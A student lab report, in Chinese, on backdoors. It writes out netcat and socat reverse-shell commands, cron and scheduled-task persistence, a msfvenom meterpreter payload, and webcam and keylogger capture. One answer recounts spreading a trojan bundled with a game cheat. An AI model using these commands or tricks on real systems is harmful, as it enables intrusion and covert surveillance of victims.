20154313 刘文亨 EXP2
20154313 Exp2 后门原理与实践
· 实践内容
· 实践过程
· netcat
· socat
· 基础问题回答
· 实验心得与体会
正文
实践内容
·
使用netcat和socat、msf-meterpreter等工具获得主机权限,并进行一些恶意行为,如监控摄像头、记录键盘输入、截屏等。
·
·
详情见实验指导书
·
实践过程
netcat
netcat获取主机操作Shell,cron启动
windows获得linux的shell
· windows平台下利用cmd的ipconfig命令查看到本机的ip地址为192.168.1.226
·
·
kali在终端下使用ifconfig命令查看kali的IP地址为192.168.1.176
·
·
windows下使用ncat.exe -l -p 4313命令运行ncat.exe监听4313端口。
·
·
kali下使用为nc 192.168.1.226(即主机ip) 4313 -e /bin/sh命令连接windows的4313端口。
·
·
连接成功后,我们就可以在windows主机获取kali的信息,如输入ls命令:
·
linux获得windows的shell
· kali下使用nc -l -p 4313命令监听4313端口。
· windows下使用ncat.exe -e cmd.exe 192.168.1.176(即kali的IP地址)连接kali的4313端口。
· 连接成功后,我们就可以在kali主机获取windows的信息,此时已成功获取windows的shell。
使用netcat传输数据
·
windows下使用ncat.exe -l -p 4313命令运行ncat.exe监听4313端口。
·
· kali下使用为nc 192.168.1.226(即主机ip) 4313命令连接windows的4313端口。
·
建立连接后,尝试传输。
·
cron启动
·
windows下使用ncat.exe -l -p 4313命令运行ncat.exe监听4313端口。
·
· kali下使用crontab -e命令,设置一条定时指令,因为现在是22:40,所以我设置成在每小时的第42分钟反向连接windows主机的4313端口。
· 42 * * * * /bin/netcat 172.30.6.204 4313 -e /bin/sh
·
42分时连接成功,成功获得linux的shell,输入ls指令查看。(这里由于我使用的是中文版,所以桌面、文档、下载等均无法正常显示)
·
socat
socat获取主机操作Shell, 任务计划启动。
· windows下在控制面板->管理工具->任务计划程序中新建一个触发器。
· 再新建一个操作,程序路径选择socat.exe的安装路径,填写参数tcp-listen:4327 exec:cmd.exe,pty,stderr
· 待重启后,刷新任务,可看到任务已经开始执行。
· kali下使用socat - tcp:172.30.6.204(即主机ip):4313(端口),此时已成功获取windows的shell。
msf-meterpreter
msf-meterpreter 生成后门,传输到靶机获取shell
· 在kali下输入命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.176 LPORT=4313 -f exe > 20154313.exe 生成一个名为20154313的后门程序
· 使用netcat将这个后门程序传输到windows主机上。
首先我们在windows下输入ncat.exe -lv 4313> 20154313.exe
随后在Linux下使用ncat -nv 172.30.6.204 4327 < 20154313exe命令把文件传送过去
· 这里在杀毒软件上设置20154313.exe为信任程序,后运行
使用msf获取目标摄像头,进行录屏、键盘记录等操作
· 首先msf打开监听进程
· msfconsole //进入msf
· use exploit/multi/handler //进入handler模式
· set payload windows/meterpreter/reverse_tcp //设置payload
· set LHOST 172.30.1.193 //将LHOST设置为LinuxIP地址
· set LPORT 4327 //设端口为那个4327
· exploit //MSF开始监听
查看系统信息、获取键盘输入、截获摄像头
· 摄像头:
· 提权:
基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
答:以前尝试过,将生成好的灰鸽子文件和cf游戏外挂捆绑在一起,然后上传到游戏论坛上,并注明,因为有注入,所以会被误报,关闭杀软运行,等待肉鸡上线。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
答:如上例所说的捆绑方式,还有将自己设为开机启动,在开机后自动运行,以及伪装文件,将自己伪装成常用软件,等待用户点击。
(3)Meterpreter有哪些给你映像深刻的功能?
答:打开摄像头录拍,平时家里电脑放在桌子上,都是正对着床,以后还是用卫生纸挡住。
(4)如何发现自己有系统有没有被安装后门?
答:查看当前电脑的开机项,检测是否有未知项,查看电脑是否存在异常,例如莫名其妙出现的“全家桶”、cpu硬盘等占用异常。
实验心得与体会
这次实验比较简单比较有趣,让我懂得了后门以及木马,学会了使用工具来获得权限,了解了监控摄像头以及记录键盘等恶意行为的使用。
·